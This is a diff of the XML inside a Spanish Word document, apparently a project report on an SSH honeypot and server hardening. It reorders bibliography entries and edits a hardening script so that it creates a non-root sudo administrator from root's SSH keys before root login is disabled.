-        <w:t xml:space="preserve">Oracle. (s. f.-b). Oracle Cloud Infrastructure Python SDK. https://docs.oracle.com/en-us/iaas/tools/python/latest/</w:t>
+        <w:t xml:space="preserve">Hetzner Online GmbH. (s. f.). Fraud prevention FAQ. Hetzner Docs. https://docs.hetzner.com/general/security-and-identify/fraud-prevention-faq/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24229,7 +24546,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Biblioteca SSH empleada en el ataque simulado de las pruebas.</w:t>
+        <w:t xml:space="preserve">Plataforma cloud prevista en el anteproyecto.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24243,7 +24560,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Paramiko. (s. f.). Paramiko: A Python implementation of SSHv2. https://www.paramiko.org/</w:t>
+        <w:t xml:space="preserve">Oracle Corporation. (s. f.). Oracle Cloud Free Tier. https://www.oracle.com/cloud/free/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24261,7 +24578,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Servicio de notificaciones push del script de aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">SDK utilizado por el script de aprovisionamiento oci_a1_retry.py.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24275,7 +24592,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">ntfy. (s. f.). ntfy: Send push notifications to your phone or desktop via PUT/POST. https://ntfy.sh/</w:t>
+        <w:t xml:space="preserve">Oracle. (s. f.-b). Oracle Cloud Infrastructure Python SDK. https://docs.oracle.com/en-us/iaas/tools/python/latest/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24293,7 +24610,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Límites del tier Always Free y política de recuperación de instancias ociosas.</w:t>
+        <w:t xml:space="preserve">Biblioteca SSH empleada en el ataque simulado de las pruebas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24307,7 +24624,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Oracle. (s. f.-a). Always Free resources. Oracle Cloud Infrastructure Documentation. https://docs.oracle.com/en-us/iaas/Content/FreeTier/freetier_topic-Always_Free_Resources.htm</w:t>
+        <w:t xml:space="preserve">Paramiko. (s. f.). Paramiko: A Python implementation of SSHv2. https://www.paramiko.org/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24325,7 +24642,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">SIEM para ingesta y visualización de logs.</w:t>
+        <w:t xml:space="preserve">Servicio de notificaciones push del script de aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24339,7 +24656,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Wazuh, Inc. (s. f.). Wazuh – Open Source Security Platform. https://wazuh.com/</w:t>
+        <w:t xml:space="preserve">ntfy. (s. f.). ntfy: Send push notifications to your phone or desktop via PUT/POST. https://ntfy.sh/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24357,7 +24674,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Biblioteca de generación de gráficas.</w:t>
+        <w:t xml:space="preserve">Límites del tier Always Free y política de recuperación de instancias ociosas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24371,7 +24688,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hunter, J. D. (2007). Matplotlib: A 2D graphics environment. Computing in Science &amp; Engineering, 9(3), 90–95. https://doi.org/10.1109/MCSE.2007.55</w:t>
+        <w:t xml:space="preserve">Oracle. (s. f.-a). Always Free resources. Oracle Cloud Infrastructure Documentation. https://docs.oracle.com/en-us/iaas/Content/FreeTier/freetier_topic-Always_Free_Resources.htm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24389,7 +24706,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Geolocalización de IPs atacantes.</w:t>
+        <w:t xml:space="preserve">SIEM para ingesta y visualización de logs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24403,7 +24720,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">ip-api. (s. f.). IP Geolocation API. https://ip-api.com/</w:t>
+        <w:t xml:space="preserve">Wazuh, Inc. (s. f.). Wazuh – Open Source Security Platform. https://wazuh.com/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24421,7 +24738,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Referencia sobre ataques SSH y honeypots.</w:t>
+        <w:t xml:space="preserve">Biblioteca de generación de gráficas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24435,7 +24752,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Provos, N. y Holz, T. (2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison-Wesley.</w:t>
+        <w:t xml:space="preserve">Hunter, J. D. (2007). Matplotlib: A 2D graphics environment. Computing in Science &amp; Engineering, 9(3), 90–95. https://doi.org/10.1109/MCSE.2007.55</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24453,7 +24770,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Informes de incidentes de seguridad en España.</w:t>
+        <w:t xml:space="preserve">Geolocalización de IPs atacantes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24467,7 +24784,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Centro Criptológico Nacional. (2024). CCN-CERT IA – Informe Anual 2024. https://www.ccn-cert.cni.es/</w:t>
+        <w:t xml:space="preserve">ip-api. (s. f.). IP Geolocation API. https://ip-api.com/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24485,7 +24802,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sistema operativo del servidor.</w:t>
+        <w:t xml:space="preserve">Referencia sobre ataques SSH y honeypots.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24499,7 +24816,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Canonical Ltd. (s. f.). Ubuntu Server 24.04 LTS. https://ubuntu.com/server</w:t>
+        <w:t xml:space="preserve">Provos, N. y Holz, T. (2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison-Wesley.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24517,7 +24834,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Distribución para pruebas de seguridad.</w:t>
+        <w:t xml:space="preserve">Informes de incidentes de seguridad en España.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24531,12 +24848,77 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Centro Criptológico Nacional. (2024). CCN-CERT IA – Informe Anual 2024. https://www.ccn-cert.cni.es/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sistema operativo del servidor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="360"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Canonical Ltd. (s. f.). Ubuntu Server 24.04 LTS. https://ubuntu.com/server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Distribución para pruebas de seguridad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="360"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">OffSec Services Limited. (s. f.). Kali Linux. https://www.kali.org/</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -24574,6 +24956,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -25430,6 +25813,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -25854,6 +26238,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -26342,6 +26727,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -27006,6 +27392,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -27041,6 +27428,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -27860,6 +28248,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -28412,6 +28801,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -28599,23 +28989,39 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">#  Uso:  sudo bash 01_hardening.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#  Probado para Ubuntu Server 24.04 LTS (imagenes de Oracle Cloud).</w:t>
+        <w:t xml:space="preserve">#  Uso:  sudo bash 01_hardening.sh   (o como root: bash 01_hardening.sh)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#  Probado para Ubuntu Server 24.04 LTS. Valido para proveedores que</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#  entregan un usuario "ubuntu" (Oracle, AWS) o solo root (Hetzner).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28695,22 +29101,6 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">ADMIN_USER="${SUDO_USER:-ubuntu}"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
         <w:t xml:space="preserve">SCRIPT_DIR="$(cd "$(dirname "$0")" &amp;&amp; pwd)"</w:t>
       </w:r>
     </w:p>
@@ -28839,7 +29229,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">[[ $EUID -eq 0 ]] || die "Ejecuta el script con sudo."</w:t>
+        <w:t xml:space="preserve">[[ $EUID -eq 0 ]] || die "Ejecuta el script con sudo (o como root)."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28871,6 +29261,470 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># --- Usuario administrador ---------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Este script prohibe el acceso SSH como root, asi que antes debe existir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># un usuario administrador con tu clave. Si la maquina solo trae root</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># (Hetzner), se crea uno copiando la clave autorizada de root.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">if [[ -n "${SUDO_USER:-}" &amp;&amp; "${SUDO_USER}" != "root" ]]; then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  ADMIN_USER="$SUDO_USER"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">elif id ubuntu &amp;&gt;/dev/null &amp;&amp; [[ -s /home/ubuntu/.ssh/authorized_keys ]]; then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  ADMIN_USER=ubuntu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">else</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  [[ -s /root/.ssh/authorized_keys ]] || die "root no tiene claves en /root/.ssh/authorized_keys."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  read -rp "  Nombre del usuario administrador a crear [diego]: " ADMIN_USER</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  ADMIN_USER="${ADMIN_USER:-diego}"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  [[ "$ADMIN_USER" =~ ^[a-z_][a-z0-9_-]*$ ]] || die "Nombre de usuario no valido."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  if ! id "$ADMIN_USER" &amp;&gt;/dev/null; then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    info "Creando el usuario administrador $ADMIN_USER..."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    adduser --disabled-password --gecos "" "$ADMIN_USER"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  fi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  usermod -aG sudo "$ADMIN_USER"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  install -d -m 700 -o "$ADMIN_USER" -g "$ADMIN_USER" "/home/$ADMIN_USER/.ssh"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  install -m 600 -o "$ADMIN_USER" -g "$ADMIN_USER" /root/.ssh/authorized_keys \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "/home/$ADMIN_USER/.ssh/authorized_keys"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  # Solo se pide contrasena si el usuario aun no tiene una (estado "P"),</w:t>
